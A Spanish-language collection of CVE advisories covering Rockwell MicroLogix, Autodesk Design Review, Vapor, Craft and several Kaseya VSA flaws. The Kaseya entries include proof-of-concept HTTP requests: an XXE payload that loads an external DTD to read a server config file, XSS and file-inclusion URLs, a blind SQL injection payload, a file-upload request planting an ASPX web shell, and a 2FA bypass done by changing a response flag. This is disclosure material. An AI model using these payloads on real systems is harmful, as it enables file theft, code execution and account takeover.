Vulnerabilidades

Rockwell Automation MicroLogix 1100, todas las versiones, permite a un atacante remoto no autenticado enviar comandos especialmente diseñados para causar un fallo en el PLC cuando el controlador es colocado en modo RUN, lo que resulta en una condición de denegación de servicio. Si es explotado con éxito, esta vulnerabilidad causará al controlador cometer un fallo cada vez que es colocado en modo RUN

Un archivo TIFF, TIF, PICT, TGA o DWF malintencionado en Autodesk Design Review 2018, 2017, 2013, 2012, 2011 puede ser forzado a leer más allá de los límites asignados al analizar los archivos TIFF, PICT, TGA o DWF. Esta vulnerabilidad en conjunto con otras vulnerabilidades podría llevar a la ejecución de código en el contexto del proceso actual

Una vulnerabilidad Double Free permite a los atacantes remotos ejecutar código arbitrario en archivos PDF dentro de las instalaciones afectadas de Autodesk Design Review 2018, 2017, 2013, 2012, 2011. Se requiere la interacción del usuario para explotar esta vulnerabilidad, ya que el objetivo debe visitar una página maliciosa o abrir un archivo malicioso

Podría producirse un desbordamiento del búfer basado en la pila mientras se analizan archivos PICT, PCX, RCL o TIFF en Autodesk Design Review 2018, 2017, 2013, 2012, 2011. Esta vulnerabilidad puede ser explotada para ejecutar código arbitrario.

Ether Logs es un paquete que permite comprobar los registros en la sección de utilidades de Craft 3. En versiones anteriores a 3.0.4 se ha encontrado una vulnerabilidad que permitía a usuarios administradores autenticados acceder a cualquier archivo del servidor. La vulnerabilidad ha sido corregida en versión 3.0.4. Como solución alternativa, se puede desactivar el plugin si fuentes no confiables presentan acceso de administrador

La API /vsaWS/KaseyaWS.asmx puede utilizarse para enviar XML al sistema. Cuando este XML es procesado (externo) las entidades son procesadas y obtenidas de forma insegura por el sistema y devueltas al atacante. Descripción detallada Dada la siguiente petición: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob. dtd"><data>&send;</data> ``` Y el siguiente archivo XML alojado en http://192.168.1.170/oob.dtd: ``` "> %eval; %error; ``` El servidor obtendrá este archivo XML y lo procesará, leerá el archivo c:\kaseya\kserver\kserver.ini y devolverá el contenido en la respuesta del servidor como se indica a continuación. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 soap:ServerEl servidor no pudo procesar la solicitud. ---Hay un error en el documento XML (24, -1000): Identificador de fragmento '######################################################################## # Este es el archivo de configuración para el KServer. # Colóquelo en el mismo directorio que el ejecutable del KServer # Una línea en blanco o una nueva cabecera de sección válida [] termina cada sección. # Las líneas de comentario comienzan con ; o # ######################################################################## ``` Problemas de seguridad descubiertos --- * La API resuelve de forma insegura entidades XML externas * La API tiene una respuesta de error demasiado verbosa Impacto --- Usando esta vulnerabilidad un atacante puede leer cualquier archivo en el servidor que el proceso del servidor web pueda leer. Además, puede ser utilizado para realizar solicitudes HTTP(s) en la red local y así utilizar el sistema Kaseya para pivotar en la red local

XSS reflexivo autenticado en HelpDeskTab/rcResults.asp El parámetro result de /HelpDeskTab/rcResults.asp se devuelve de forma insegura en la página web solicitada y puede utilizarse para realizar un ataque de Cross Site Scripting Ejemplo de solicitud: `https://x.x.x.x/HelpDeskTab/rcResults. asp?result=` Lo mismo ocurre con el parámetro FileName de /done.asp Petición de ejemplo: `https://x.x.x.x/done.asp?FileName=";

Inclusión de archivos locales semiautenticados El contenido de archivos arbitrarios puede ser devuelto por el servidor web Ejemplo de solicitud: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` Se requiere un SessionId válido pero puede ser fácilmente obtenido a través de CVE-2021-30118

La llamada a la API /InstallTab/exportFldr.asp es vulnerable a una inyección SQL ciega semiautenticada basada en booleanos en el parámetro fldrId. Descripción detallada --- Dada la siguiente petición: ``` GET /InstallTab/exportFldr.asp?fldrId=1' HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Donde el valor de la cookie sessionId se ha obtenido mediante CVE-2021-30116. El resultado debería ser un fallo. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 Whoops. ----SNIP---- ``` Sin embargo, cuando fldrId está configurado como '(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))' la petición está permitida. Solicitud: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29END%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Respuesta: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 Carpeta de exportación

Un atacante puede cargar archivos con el privilegio del proceso del Servidor Web para el Monitoreo y Gestión Remota Unificada (RMM) de Kaseya VSA 9.5.4.2149 y posteriormente utilizar estos archivos para ejecutar comandos asp La api /SystemTab/uploader.aspx es vulnerable a una carga de archivos arbitraria no autenticada que conduce a RCE. Un atacante puede cargar archivos con el privilegio del proceso del Servidor Web y posteriormente utilizar estos archivos para ejecutar comandos asp. Descripción detallada --- Dada la siguiente petición: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1. 194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System. Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System. Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System. Collections" %>

Vapor es un framework web para Swift. En las versiones 4.47.1 y anteriores, un bug en la función "Data.init(base32Encoded:)" abre el potencial para exponer la memoria del servidor y/o de bloquear el servidor (Denegación de Servicio) para aplicaciones en las que datos no confiables pueden terminar en dicha función. Vapor no usa actualmente esta función por sí mismo, por lo que esto sólo afecta a las aplicaciones que usan la función impactada directamente o mediante otras dependencias. La vulnerabilidad está parcheada en la versión 4.47.2. Como solución alternativa, se puede usar una alternativa a la función incorporada de Vapor "Data.init(base32Encoded:)"

Kaseya VSA antes de la versión 9.5.7 permite a los atacantes eludir el requisito de 2FA. La necesidad de usar 2FA para la autenticación en la aplicación del lado del cliente en lugar del lado del servidor y puede ser evadida usando un proxy local. De este modo, se hace inútil la 2FA. Descripción detallada --- Durante el proceso de inicio de sesión, después de que el usuario se autentique con nombre de usuario y contraseña, el servidor envía una respuesta al cliente con los booleanos MFARequired y MFAEnroled. Si el atacante ha obtenido la contraseña de un usuario y ha utilizado un proxy de intercepción (por ejemplo, Burp Suite) para cambiar el valor de MFARequered de True a False, no se solicita el segundo factor, pero el usuario sigue conectado